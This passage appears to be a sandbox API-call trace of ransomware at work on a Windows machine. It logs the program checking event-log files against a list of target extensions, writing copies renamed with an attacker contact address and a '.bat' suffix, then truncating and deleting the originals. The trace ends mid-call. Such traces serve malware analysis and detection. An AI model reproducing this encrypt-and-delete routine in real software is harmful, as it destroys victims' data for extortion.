lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString=".rar") returned 4 [0063.152] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString=".bz2") returned 4 [0063.152] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString=".7z") returned 3 [0063.152] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.152] lstrlenW (lpString=".dbf") returned 4 [0063.152] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.152] lstrlenW (lpString=".1cd") returned 4 [0063.152] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.152] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0063.152] lstrlenW (lpString=".jpg") returned 4 [0063.152] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.152] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0063.152] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 55 [0063.152] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.153] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0063.153] CloseHandle (hObject=0x384) returned 1 [0063.153] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 0x20 [0063.153] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.153] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.153] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.153] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.153] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0063.154] GetLastError () returned 0x0 [0063.154] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0063.156] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0063.157] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.157] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x142, lpOverlapped=0x0) returned 1 [0063.157] SetEndOfFile (hFile=0x388) returned 1 [0063.157] CloseHandle (hObject=0x388) returned 1 [0063.159] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.159] SetEndOfFile (hFile=0x384) returned 1 [0063.160] CloseHandle (hObject=0x384) returned 1 [0063.160] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.160] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 1 [0063.161] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.161] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.161] lstrlenW (lpString=".doc") returned 4 [0063.161] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString=".docx") returned 5 [0063.161] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.161] lstrlenW (lpString=".pdf") returned 4 [0063.161] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString=".xls") returned 4 [0063.161] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString=".xlsx") returned 5 [0063.161] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.161] lstrlenW (lpString=".ppt") returned 4 [0063.161] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.161] lstrlenW (lpString=".zip") returned 4 [0063.161] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString=".rar") returned 4 [0063.161] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString=".bz2") returned 4 [0063.161] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.161] lstrlenW (lpString=".7z") returned 3 [0063.161] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.162] lstrlenW (lpString=".dbf") returned 4 [0063.162] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.162] lstrlenW (lpString=".1cd") returned 4 [0063.162] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.162] lstrlenW (lpString=".jpg") returned 4 [0063.162] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.162] lstrlenW (lpString=".doc") returned 4 [0063.162] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString=".docx") returned 5 [0063.162] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.162] lstrlenW (lpString=".pdf") returned 4 [0063.162] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString=".xls") returned 4 [0063.162] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString=".xlsx") returned 5 [0063.162] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.162] lstrlenW (lpString=".ppt") returned 4 [0063.162] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.162] lstrlenW (lpString=".zip") returned 4 [0063.162] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString=".rar") returned 4 [0063.162] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString=".bz2") returned 4 [0063.162] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.162] lstrlenW (lpString=".7z") returned 3 [0063.162] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.162] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.163] lstrlenW (lpString=".dbf") returned 4 [0063.163] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.163] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.163] lstrlenW (lpString=".1cd") returned 4 [0063.163] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.163] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0063.163] lstrlenW (lpString=".jpg") returned 4 [0063.163] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.163] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0063.163] lstrlenW (lpString="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 49 [0063.163] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.163] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0063.163] CloseHandle (hObject=0x384) returned 1 [0063.163] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 0x20 [0063.163] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.163] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.163] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.164] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.164] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0063.164] GetLastError () returned 0x0 [0063.164] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0063.167] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0063.168] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.168] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x136, lpOverlapped=0x0) returned 1 [0063.169] SetEndOfFile (hFile=0x388) returned 1 [0063.169] CloseHandle (hObject=0x388) returned 1 [0063.170] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.170] SetEndOfFile (hFile=0x384) returned 1 [0063.171] CloseHandle (hObject=0x384) returned 1 [0063.172] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.172] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 1 [0063.172] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.172] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.172] lstrlenW (lpString=".doc") returned 4 [0063.172] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.172] lstrlenW (lpString=".docx") returned 5 [0063.172] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.172] lstrlenW (lpString=".pdf") returned 4 [0063.172] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.172] lstrlenW (lpString=".xls") returned 4 [0063.172] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.172] lstrlenW (lpString=".xlsx") returned 5 [0063.172] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.173] lstrlenW (lpString=".ppt") returned 4 [0063.173] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.173] lstrlenW (lpString=".zip") returned 4 [0063.173] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString=".rar") returned 4 [0063.173] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString=".bz2") returned 4 [0063.173] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString=".7z") returned 3 [0063.173] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.173] lstrlenW (lpString=".dbf") returned 4 [0063.173] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.173] lstrlenW (lpString=".1cd") returned 4 [0063.173] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.173] lstrlenW (lpString=".jpg") returned 4 [0063.173] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.173] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.173] lstrlenW (lpString=".doc") returned 4 [0063.173] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.173] lstrlenW (lpString=".docx") returned 5 [0063.173] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.173] lstrlenW (lpString=".pdf") returned 4 [0063.173] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString=".xls") returned 4 [0063.174] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString=".xlsx") returned 5 [0063.174] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.174] lstrlenW (lpString=".ppt") returned 4 [0063.174] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.174] lstrlenW (lpString=".zip") returned 4 [0063.174] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString=".rar") returned 4 [0063.174] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString=".bz2") returned 4 [0063.174] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString=".7z") returned 3 [0063.174] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.174] lstrlenW (lpString=".dbf") returned 4 [0063.174] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.174] lstrlenW (lpString=".1cd") returned 4 [0063.174] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.174] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0063.174] lstrlenW (lpString=".jpg") returned 4 [0063.174] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.174] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0063.174] lstrlenW (lpString="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 64 [0063.175] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.175] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0063.175] CloseHandle (hObject=0x384) returned 1 [0063.175] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 0x20 [0063.176] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.176] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.176] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.176] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.176] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0063.176] GetLastError () returned 0x0 [0063.177] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0063.178] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0063.180] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.180] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x154, lpOverlapped=0x0) returned 1 [0063.180] SetEndOfFile (hFile=0x388) returned 1 [0063.180] CloseHandle (hObject=0x388) returned 1 [0063.182] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.182] SetEndOfFile (hFile=0x384) returned 1 [0063.183] CloseHandle (hObject=0x384) returned 1 [0063.183] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.183] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 1 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.184] lstrlenW (lpString=".doc") returned 4 [0063.184] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString=".docx") returned 5 [0063.184] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.184] lstrlenW (lpString=".pdf") returned 4 [0063.184] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString=".xls") returned 4 [0063.184] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString=".xlsx") returned 5 [0063.184] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.184] lstrlenW (lpString=".ppt") returned 4 [0063.184] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.184] lstrlenW (lpString=".zip") returned 4 [0063.184] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString=".rar") returned 4 [0063.184] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString=".bz2") returned 4 [0063.184] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString=".7z") returned 3 [0063.184] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.184] lstrlenW (lpString=".dbf") returned 4 [0063.184] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.184] lstrlenW (lpString=".1cd") returned 4 [0063.184] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.184] lstrlenW (lpString=".jpg") returned 4 [0063.184] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.184] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.185] lstrlenW (lpString=".doc") returned 4 [0063.185] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString=".docx") returned 5 [0063.185] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.185] lstrlenW (lpString=".pdf") returned 4 [0063.185] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString=".xls") returned 4 [0063.185] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString=".xlsx") returned 5 [0063.185] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.185] lstrlenW (lpString=".ppt") returned 4 [0063.185] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.185] lstrlenW (lpString=".zip") returned 4 [0063.185] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString=".rar") returned 4 [0063.185] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString=".bz2") returned 4 [0063.185] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString=".7z") returned 3 [0063.185] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.185] lstrlenW (lpString=".dbf") returned 4 [0063.185] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.185] lstrlenW (lpString=".1cd") returned 4 [0063.185] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.185] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 72 [0063.185] lstrlenW (lpString=".jpg") returned 4 [0063.185] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.185] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0063.185] lstrlenW (lpString="Microsoft-Windows-Bits-Client%4Operational.evtx") returned 47 [0063.186] CreateFileW 